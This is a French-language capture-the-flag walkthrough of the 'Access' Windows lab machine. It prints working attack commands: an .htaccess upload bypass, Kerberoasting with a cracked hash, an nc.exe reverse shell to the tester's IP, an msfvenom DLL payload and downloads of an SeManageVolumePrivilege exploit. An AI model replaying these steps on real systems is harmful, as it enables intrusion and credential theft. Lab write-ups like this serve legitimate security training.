Access

.htaccess SeManageVolumePrivilege Upload file SPN kerberoast

Nom machine : Access
Difficulté : Intermédiaire
OS : Windows

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-22 06:33 EDT
Nmap scan report for 192.168.178.187
Host is up (0.034s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-title: Access The Event
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-08-22 10:38:32Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
49802/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Nous avons un nom de domaine : access.offsec

HTTP (80)

Nous allons chercher des directoires intéressants

┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.178.187/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.178.187/__24-08-22_06-34-49.txt

Target: http://192.168.178.187/

[06:34:49] Starting: 
[06:34:50] 403 -  304B  - /%3f/
[06:34:50] 403 -  304B  - /%C0%AE%C0%AE%C0%AF
[06:34:50] 403 -  304B  - /%ff
[06:34:51] 403 -  304B  - /.htaccess.bak1
[06:34:51] 403 -  304B  - /.htaccess.orig
[06:34:51] 403 -  304B  - /.ht_wsr.txt
[06:34:51] 403 -  304B  - /.htaccess_extra
[06:34:51] 403 -  304B  - /.htaccess_sc
[06:34:51] 403 -  304B  - /.htaccess.save
[06:34:51] 403 -  304B  - /.htaccess.sample
[06:34:51] 403 -  304B  - /.htaccessBAK
[06:34:51] 403 -  304B  - /.htaccess_orig
[06:34:51] 403 -  304B  - /.htaccessOLD
[06:34:51] 403 -  304B  - /.htaccessOLD2
[06:34:51] 403 -  304B  - /.htm
[06:34:51] 403 -  304B  - /.html
[06:34:51] 403 -  304B  - /.htpasswd_test
[06:34:51] 403 -  304B  - /.htpasswds
[06:34:51] 403 -  304B  - /.httr-oauth
[06:34:58] 301 -  343B  - /assets  ->  http://192.168.178.187/assets/
[06:34:58] 200 -    2KB - /assets/
[06:35:00] 403 -  304B  - /cgi-bin/
[06:35:00] 200 -    2KB - /cgi-bin/printenv.pl
[06:35:04] 301 -  342B  - /forms  ->  http://192.168.178.187/forms/
[06:35:04] 503 -  404B  - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[06:35:04] 503 -  404B  - /examples/jsp/index.html
[06:35:04] 503 -  404B  - /examples/servlet/SnoopServlet
[06:35:04] 503 -  404B  - /examples
[06:35:04] 503 -  404B  - /examples/websocket/index.xhtml
[06:35:04] 503 -  404B  - /examples/servlets/servlet/RequestHeaderExample
[06:35:04] 503 -  404B  - /examples/
[06:35:04] 503 -  404B  - /examples/servlets/servlet/CookieExample
[06:35:04] 503 -  404B  - /examples/servlets/index.html
[06:35:04] 503 -  404B  - /examples/jsp/snp/snoop.jsp
[06:35:05] 403 -  304B  - /index.php::$DATA
[06:35:10] 403 -  423B  - /phpmyadmin
[06:35:11] 403 -  423B  - /phpmyadmin/doc/html/index.html
[06:35:11] 403 -  423B  - /phpmyadmin/
[06:35:11] 403 -  423B  - /phpmyadmin/docs/html/index.html
[06:35:11] 403 -  423B  - /phpmyadmin/ChangeLog
[06:35:11] 403 -  423B  - /phpmyadmin/phpmyadmin/index.php
[06:35:11] 403 -  423B  - /phpmyadmin/index.php
[06:35:11] 403 -  423B  - /phpmyadmin/scripts/setup.php
[06:35:11] 403 -  423B  - /phpmyadmin/README
[06:35:13] 403 -  423B  - /server-info
[06:35:13] 403 -  423B  - /server-status/
[06:35:13] 403 -  423B  - /server-status
[06:35:17] 403 -  304B  - /Trace.axd::$DATA
[06:35:17] 200 -  988B  - /uploads/
[06:35:17] 301 -  344B  - /uploads  ->  http://192.168.178.187/uploads/
[06:35:19] 403 -  304B  - /web.config::$DATA
[06:35:19] 403 -  423B  - /webalizer
[06:35:19] 403 -  423B  - /webalizer/

Task Completed

/uploads pourrait être utile.

Lorsqu'on veut acheter un ticket :

Nous avons essayé d'upload un gif et cela a fonctionné, nous l'avons retrouver dans /uploads

Nous allons maintenant chercher à obtenir un shell.

Accès Initial

Une simple modification dans burp suite fonctionne. En effet, nous avons modifié l'extension .php en .gif. Le fichier ne peut s'exécuter mais nous avons une piste, et nous savons que nous avons juste à jouer avec les extensions de fichier.

Une simple suppression d'extension marche, ainsi que l'encodage du point de l'extension en URL.

Cependant on n'arrive pas à exécuter de commandes.

Nous allons chercher plus loin.

Bypass file upload filter with .htaccessthibaud-robin.fr

Nous allons upload un fichier .htaccess permettant d'exécuter du code php avec l'extension choisi : ici "php16"

┌──(kali㉿kali)-[~]
└─$ echo "AddType application/x-httpd-php .php16> .htaccess

Maintenant, si on upload shell.php16, le code php s'exécutent belle et bien. Deux solutions s'offrent à nous :

1: on injecte le payload powershell base64 dans le paramètre cmd (via la barre ou l'url)
2: on upload directement un reverse shell (Ivan Sincek)

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 135 
listening on [any] 135 ...
connect to [192.168.45.189] from (UNKNOWN) [192.168.178.187] 51564
SOCKET: Shell has connected! PID: 4592
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\uploads>whoami
access\svc_apache

Elévation des privilèges

En fouillant et exécutant winpeas, nous ne trouvons rien d'intéressant.

Nous allons tenter une attaque kerberoast avec rubeus.

S C:\xampp\htdocs\uploads> ./rubeus.exe kerberoast /outfile:hash.txt

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : access.offsec
[*] Searching path 'LDAP://SERVER.access.offsec/DC=access,DC=offsec' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1


[*] SamAccountName         : svc_mssql
[*] DistinguishedName      : CN=MSSQL,CN=Users,DC=access,DC=offsec
[*] ServicePrincipalName   : MSSQLSvc/DC.access.offsec
[*] PwdLastSet             : 5/21/2022 5:33:45 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash written to C:\xampp\htdocs\uploads\hash.txt

[*] Roasted hashes written to : C:\xampp\htdocs\uploads\hash.txt
PS C:\xampp\htdocs\uploads> type hash.txt
$krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.access.offsec@access.offsec*$C9F0EE98301607FC5A20D06B30A96230$C53E2A114FFAFF6A1004E1FBC4974DC2088E1C97ED90A9FC5C57DB357EE697345F5C4084A1C774023AA9B2FAD7A6B7DF85F370B9F17BBE7D4AA9C145357FBDFDE8CFA420CA7B517519D52A87887B75352D4A324D3AEF8B60E3AAB721B736C991E9EB84BDDDB33081F99DBC9A67116EEA87BB436B254565210A862DDAF897861E09CA2F5D88220F35625C702830AF968420852251A94E78CDE45B2C553988F3A81A12278B27A1CA5011D9D27519471DBD954DCA482D3D8BDB5DE0E9FF7A87A52C383217AB472C03B81BE46A55FC9888BF57A201EE55BE0DB9452BD3E10EBA2F07026FB438E1355822CD0F1E5A25D2E92D417B8BA62CA885418188BFBF06F089163C4232F6455D43647E263318E7BD328A68208A931F61C8D3EC284508FF56FA297CBF5F14ADB0D47F30A58D81A36F350DDA38F2C124844B21581CC7797AC18309AA672760A2EE936090277F1673E7AA5B044C529CC1C7AFEA0308EAC21E6FE27F061EB4974D947E7C1F95619294398E828D5CA17B2962DA7D25F9BA480C3DE8EE11E8C393814C247923F3C43891E3389396CF0D21E2EE58E5A45DF8070BF29B91D73E1540FAA743360E6776F843376DA880E552974599CE0CEA087303F939FC893063F518BBD7F002F8C4A035D5168A821920F484CDBD082EAD1702D2B2B8AA817D0C593854C36DE4AE6F0D0B363FF0039D0A28998D6B5A0D8F2AEE8434DB9E1E11FD15ACEB9821E97F63AF4F5B61D5B19C5973E68DA68FB34BFB01A267FC90B88A6ECADCDE51B07887FE61219FAE263C8C847EF718D33FC1D945A190DFD146393D4F56E7711A441453F6B83F87D88693856C4B87D6C52C3530429BA5F6041F3FC2CB9D3BA238F36777C9E939ED4720676E516E76B9A5367C6903D68FFC630B51F49491FD1D7D1C76C7D9512434B5B90C823D0C8F96B43FB1661022BC4F1F45518F5A0DA4CECE156D05B5EF7CABB7BAFCDC1A73CBA656F10EEEE82255206EE857C273C54F72552DCE9A35345B8E03897E6AE4C2BC31E8703BE26C3F93626C2181919B4B3AB79E38FA09FCEA043E0F8F187FCA4C03C1C4E597B118092E642525506D029155EEFC3691C64D7C5FD512FD83C69C6FDF8736D9B3E56502DBA144C3079C9CBCF0DE19D8E2F4FBC481495A645B64FB07B80B95F36CDE4DB1FFE9E56CBD733BEB8502CF11C31F6A5A87BD51A2E6C8BEA85B83E733B32E231E0E0B19104342917630564D2A7204FD9C20C68E703BCE447E52BF78E5FDCA8A5BCB1559669DA1B402EA3A4D5D929F23A6DDF6A7B5BC247BD5E2DDBB888CC010CBBF0429D608BC4755E13DD6C89491610643EDA8005424478AF164A1D47A3B6837FB7C13621EBE754219BEFCD5B25CC67C11FB5231B11F042F2F873EB526630B767C8A51D842637F5D03A6EB6E045DCAAD5D765680E307EDE7E160C513C375228582A38B71FFE72FEB723E1C847113F25541100A6D0688C01440F58DD464019E3800B703EE461EC01426E6363840D7309B07434DDF2C37D1BC568A9D090A3622DDA0E1D8546EABBBF76A13811DC36D042719A3325F973916998221C16745FDBA2C1420DA881935EE11B70F4C747A9DFC39E556A2DE0059C3

On recopie le fichier sur notre machine puis on va essayer de le cracker.

┌──(kali㉿kali)-[~/oscp]
└─$ john hash.txt                                           
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 5 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
trustno1         (?)     
1g 0:00:00:00 DONE 2/3 (2024-08-22 12:35) 25.00g/s 32000p/s 32000c/s 32000C/s 123456..burton
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Nous allons le mot de passe, nous allons tenter d'exécuter des commandes avec RunasCs

PS C:\xampp\htdocs\uploads> ./runas.exe svc_mssql trustno1 "cmd /c whoami /all"
[*] Warning: The logon for user 'svc_mssql' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.


USER INFORMATION
----------------

User Name        SID                                         
================ ============================================
access\svc_mssql S-1-5-21-537427935-490066102-1511301751-1104


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes                                        
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Group used for deny only                          
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                      State   
============================= ================================ ========
SeMachineAccountPrivilege     Add workstations to domain       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Nous pouvons exécuter des commandes et nous pouvons constater que nous avons un nouveau privilège : SeManageVolumePrivilege

Nous allons exécuter un reverse shell afin de nous connecter en tant que svc_mssql. Tout d'abord nous téléchargons nc.exe sur la cible.

PS C:\xampp\htdocs\uploads> ./runas.exe svc_mssql trustno1 "./nc.exe 192.168.45.189 135 -e cmd"

┌──(kali㉿kali)-[~/]
└─$ nc -lnvp 135 
listening on [any] 135 ...
 connect to [192.168.45.189] from (UNKNOWN) [192.168.178.187] 51840
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
 whoami
access\svc_mssql

Exploiting SeManageVolumePrivilege with DLL Hijacking (Windows Privilege Escalation)Medium

┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.189 LPORT=1337 -f dll -o tzres.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: tzres.dll


PS C:\Users\svc_mssql\Desktop> iwr -uri http://192.168.45.189/Tools/SeManageVolumeExploit.exe -Outfile smve.exe
PS C:\Users\svc_mssql\Desktop> ./smve.exe
./smve.exe
Entries changed: 926
DONE 
PS C:\windows\system32\wbem> iwr -uri http://192.168.45.189/tzres.dll -Outfile tzres.dll

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1337                    
listening on [any] 1337 ...
connect to [192.168.45.189] from (UNKNOWN) [192.168.178.187] 51872
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\network service

Nous sommes admin !

PrécédentPG Practice SuivantAstronaut

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagHTTP (80)

hashtagAccès Initial

hashtagElévation des privilèges

Enumération

NMAP

HTTP (80)

Accès Initial

Elévation des privilèges